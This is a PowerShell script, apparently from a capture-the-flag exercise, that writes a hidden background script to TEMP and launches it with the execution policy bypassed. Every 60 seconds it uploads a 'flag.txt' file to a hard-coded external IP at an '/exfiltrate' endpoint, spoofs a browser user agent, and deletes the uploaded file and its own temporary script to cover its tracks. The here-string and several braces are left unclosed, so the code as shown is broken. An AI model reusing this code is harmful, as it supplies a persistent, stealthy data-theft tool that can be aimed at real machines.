$filePath = "$env:TEMP\flag.txt"
$serverUrl = "http://18.157.68.73:11858/exfiltrate"
# Define the script logic as a string
$scriptContent = @'
param($filePath, $serverUrl)
function UploadFile {
param($path, $url)
try {
$webClient = New-Object System.Net.WebClient
$webClient.Headers.Add("User-Agent", "Mozilla/5.0")
$webClient.Headers.Add("Content-Type", "text/plain")
if (Test-Path $path) {
#Write-Host "[*] Uploading file: $path"
$webClient.UploadFile($url, "POST", $path)
#Write-Host "[+] File uploaded successfully!"
Remove-Item -Path $path -Force
} else {
#Write-Host "[!] No flag file found. Sending empty notification."
$webClient.UploadString($url, "POST", "No Flag file")
}
} catch {
#Write-Host "[!] Error: $($_.Exception.Message)"
} finally {
$webClient.Dispose()
while ($true) {
UploadFile -path $filePath -url $serverUrl
Start-Sleep -Seconds 60
# Save the script content to a temporary file
$scriptPath = "$env:TEMP\upload_script.ps1"
$scriptContent | Set-Content -Path $scriptPath
# Start a new PowerShell process to run the script in the background
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File `"$scriptPath`" `"$filePath`" `"$serverUrl`"" -PassThru
# Display the new process ID
Write-Host "[*] Job started with PID: $($process.Id)"
# Delete the temporary script file after starting the new process
Start-Sleep -Seconds 1
Remove-Item -Path $scriptPath -Force
#Write-Host "[*] Temporary script file deleted."